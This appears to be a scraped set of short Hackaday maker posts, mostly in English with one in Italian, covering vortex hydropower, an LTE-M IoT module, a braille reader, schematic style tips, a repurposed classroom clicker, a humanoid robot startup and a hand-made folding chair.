This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!

hackaday.com/2025/08/16/metric…

Over on his YouTube channel [Construction General] shows us how to convert a drain into a hydropower facility. This type of hydroelectric facility is known as a gravitation water vortex power plant. The central structure is a round basin which includes a central drain. The water feeds into the basin through a series of pipes which help to create the vortex which drives the water turbine before flowing out the drain.

To make the facility [Construction General] starts by laying some slabs as the foundation. One of the slabs has a hole to which the central drain pipe is attached. Bricks and mortar are then used to build the basin around the drain. A temporary central pipe is used for scaffolding along with some strings with hooks attached to hold the bricks and mortar in place for the basin. Integrated into the top half of the basin are fifteen inlet pipes which feed in water at an angle.

The next step is to build the dam wall. This is a bricks and mortar affair which includes the drain in the bottom of the wall and two spillways at the top. The spillways are for letting water flow out of the dam if it gets too full. Around the drainage in the dam wall a valve is installed. This valve is called the low-level outlet or the bottom outlet, and in this case it is a sluice, also known as a slide gate, which can be raised or lowered to control the rate of flow through the turbine.

Once the basin is complete and the low-level outlet is in place the scaffolding is removed. The basin is then painted, pink on the inside and white around the top. A turbine is constructed from various metal pieces and installed into the basin. The turbine is attached to a generator which is fixed atop the basin. The apparatus for operating the low-level outlet is installed and the dam is left to fill.

Hydropower is a topic we’ve covered here at Hackaday before, if you’re interested in the topic you might like to check out A Modest But Well-Assembled Home Hydropower Setup, Hydropower From A Washing Mashine, or Bicycle Hub Hydropower.

youtube.com/embed/PImEWUq07i0?…

hackaday.com/2025/08/16/how-to…

It wasn’t that long ago that projects with cellular connectivity were everywhere, but with 2G no longer universally available, glory days of cheap 2G modules seem to be on their way out. So when [Data Slayer] titled his video “You’ve Never Seen Cellular Like This” about a new GSM radio module, we couldn’t help but think that we have — and that we’re glad to see it back.

The module is the Walter, by DPTechnics out of Belgium. It’s fully open-source and contains a ESP32-S3 for WiFi and BLE plus a Sequans Monarch chip for GSM and GNSS connectivity. It’s not the blazing-fast 5G you’re paying your phone carrier for: this is an IoT modem, with LTE-M and NB-IoT. We’re talking speeds in the kbps, not Mbps– but we’re also talking very, very low power usage. Since it’s LTE-M rather than full LTE, you’re probably not going to be bringing back the golden days of Arduino Cellphones, (since LTE-M doesn’t support VoLTE) but if LoRa isn’t your jam, and you hang out around cell towers, this level of connectivity might interest you.

Walter is actually a drop-in replacement for PyCom’s old GPy module, so if you had a project in mind for that and are frustrated by it being EoL — well, here you are. [Data Slayer] seemed impressed enough with its capabilities as a GPS tracker. We’re impressed with the 9.8 µA consumed in deep sleep mode, and the fact that it has already been certified with the CE, FCC, IC, RCM and UKCA. Those certs mean you could go from prototype to product without getting tangled in red tape, assuming Walter is the only radio onboard.

Our thanks to [Keith Olson] for phoning in the tip. If you have a tip and want to connect, operators are standing by.

youtube.com/embed/6QUVzvhEhu4?…

hackaday.com/2025/08/16/walter…

One of the practical upsides of improved computer vision systems and machine learning has been the ability of computers to translate text from one language or format to another. [Jchen] used this to develop Braille Vision which can turn inaccessible text into braille on the go.

Using a headless Raspberry Pi 4 or 5 running Tesseract OCR, the device has a microswitch shutter to take a picture of a poster or other object. The device processes any text it finds and gives the user an audible cue when it is finished. A rotary knob on the back of the device then moves the braille display pad through each character. When the end of the message is reached, it then cycles back to the beginning.

Development involved breadboarding an Arduino hooked up to some MOSFETs to drive the solenoids for the braille display until the system worked well enough to solder together with wires and perfboard. Everything is housed in a 3D printed shell that appears similar in size to an old Polaroid instant camera.

We’ve seen a vibrating braille output prototype for smartphones, how blind makers are using 3D printing, and are wondering what ever happened with “tixel” displays? If you’re new to braille, try 3D printing your own trainer out of TPU.

youtube.com/embed/EfGsyqIRnGQ?…

hackaday.com/2025/08/15/this-p…

We often think that if a piece of software had the level of documentation you usually see for hardware, you wouldn’t think much of it. Sure, there are exceptions. Some hardware is beautifully documented, and poorly documented software is everywhere. [Graham Sutherland’s] been reviewing schematics and put together some notes on what makes a clean schematic.

Like coding standards, some of these are a bit subjective, but we thought it was all good advice. Of course, we’ve also violated some of them when we are in a hurry to get to a simulation.

Most of the rules are common sense: use enough space, add labels, and avoid using quirky angles. [Flannery O’Connor] once said, “You can do anything you can get away with, but nobody has ever gotten away with much.” She was talking about writing, but the same could be said about schematics.

[Graham] says as much, pointing out that these are more guidelines. He even points out places where you might deliberately break the rules. For example, in general, wires should always go horizontally or vertically. However, if you are crossing two parallel wires, you probably should.

So what are your schematic rules? Software has standards like MISRA, CERT, and various NASA standards. Oddly enough, one of our favorite quick schematic editors is truly terrible but obeys most of these rules. But you can surely do better than that.

hackaday.com/2025/08/15/sugges…

Around the globe, some classrooms are using fancy digital handheld devices to let people answer questions. One such example of this hardware is the Smart Response PE. These devices are largely useless outside the classroom, so [Ray Burne] decided to hack one for our 2025 One Hertz Challenge.

The Smart Response PE device is similar in shape and size to an old-school candybar cellphone. It runs on a Texas Instruments CC2533 microcontroller, which drives a simple black-and-white LCD. User interface is via a numeric keypad and a few extra control buttons on the front panel. Thanks to Github user [serisman], there are readily available development tools for this hardware. [Ray] notes it provides a straightforward Arduino-like programming experience.

[Ray] decided to modify the hardware to act as a stopwatch. But not just one stopwatch—ten stopwatches at once! Pressing a number from 0 to 9 will activate that given timer, and it will start ticking up on the LCD screen. One can pause the screen updates to get a temporary laptime reading by pressing the enter key. Meanwhile, pressing the Home button will reset the screen and all timers at once. [Ray] also explains on the project page how to add a real power switch to the device, and how to modify the programming pins for easy access.

It’s a fun build, and one that could prove useful if you regularly find yourself having to time ten of something at once. Maybe eggs? In any case, it’s certainly easier than juggling ten separate stopwatches at once! Meanwhile, if you’re hacking your own obscure hardware finds, don’t hesitate to notify the tipsline!

hackaday.com/2025/08/15/2025-o…

Il giovane fondatore cinese Jiang Zheyuan, a soli 27 anni, guida la startup Songyan Dynamics, specializzata in robot umanoidi. Con circa 140 dipendenti, Jiang si occupa personalmente di ogni aspetto dell’azienda, dallo sviluppo tecnologico alla produzione.

Il robot di punta, l’N2, alto 120 cm, si è fatto conoscere al grande pubblico quando, ad aprile, ha conquistato il secondo posto nella mezza maratona di robot di Pechino, trasmessa in diretta in tutta la Cina. Questo risultato, unito al prezzo competitivo di 39.000 yuan (circa 4600 euro), ha alimentato l’immagine dell’azienda come la “Xiaomi della robotica”.

Fondata nel settembre 2023, Songyan Dynamics ha sviluppato un prototipo funzionante di robot umanoide in meno di un mese, attirando rapidamente finanziamenti da investitori privati e dal governo di Pechino. Tuttavia, nei primi mesi l’azienda ha faticato a trovare clienti e ha affrontato una crisi finanziaria, con vendite quasi inesistenti e costi in aumento. La mancanza di un team commerciale e di marketing ha spinto Jiang a concentrare gli sforzi esclusivamente sull’innovazione hardware, puntando su funzionalità spettacolari per catturare l’attenzione del mercato.

La scelta vincente è stata sviluppare la capacità del robot di eseguire salti mortali all’indietro, uno dei movimenti più complessi per un umanoide. A marzo, Songyan Dynamics ha diffuso un video dell’N2 che compiva più backflip consecutivi, dimostrando avanzate capacità di equilibrio e coordinazione. La performance, insieme a un prezzo inferiore della metà rispetto al principale concorrente Unitree, ha dato all’azienda un vantaggio competitivo significativo e un’immediata visibilità.

La partecipazione alla maratona di aprile ha rappresentato una vetrina decisiva per Songyan Dynamics. Per un mese intero, il team ha lavorato senza sosta per migliorare la resistenza dell’N2, consentendogli di completare la gara e consolidare la sua reputazione di robot stabile e affidabile. La competizione ha dimostrato che le prestazioni non erano solo da laboratorio, ma replicabili in contesti impegnativi e reali.

Il successo mediatico e tecnico si è tradotto in un boom commerciale senza precedenti: entro un mese dalla gara, sono arrivati ordini per oltre 1.000 unità. Questo risultato ha trasformato l’azienda, facendole superare rapidamente la fase di difficoltà iniziale e aprendo prospettive di espansione sia sul mercato cinese che internazionale.

Il valore di Songyan Dynamics è cresciuto in modo vertiginoso, passando dai circa 300 milioni di yuan di inizio anno ai 2 miliardi di yuan a giugno. Guardando al futuro, Jiang Zheyuan ha già fissato il prossimo obiettivo: sviluppare un robot per le pulizie domestiche entro cinque anni, puntando a replicare l’impatto mediatico e commerciale ottenuto con l’N2, ma in un settore ad altissimo potenziale di mercato.

L'articolo Mentre N2 ipnotizza il mondo e vende 1000 esemplari, entro 5 anni un robot domestico sarà in ogni casa proviene da il blog della sicurezza informatica.

Over on his YouTube channel our hacker [GrandpaAmu] liberates a collapsible chair from a single piece of wood.

With the assistance of an extra pair of hands, but without any power tools in sight, this old master marks up a piece of wood and then cuts a collapsible chair out of it. He uses various types of saw, chisels, a manual drill, and various other hand tools. His workspace is a humble plank with a large clamp attached. At the end he does use a powered hot air gun to heat the finish he uses to coat the final product.

We love videos like this which communicate, record, and capture old know-how. Even in our electrified future with factory-made commodities everywhere, we’re all still gonna appreciate having something portable to sit on. If you’re interested in collapsible furniture you might also be interested in The Ultimate Workstation That Folds Up.

youtube.com/embed/sRjwTCYU4iE?…

hackaday.com/2025/08/15/libera…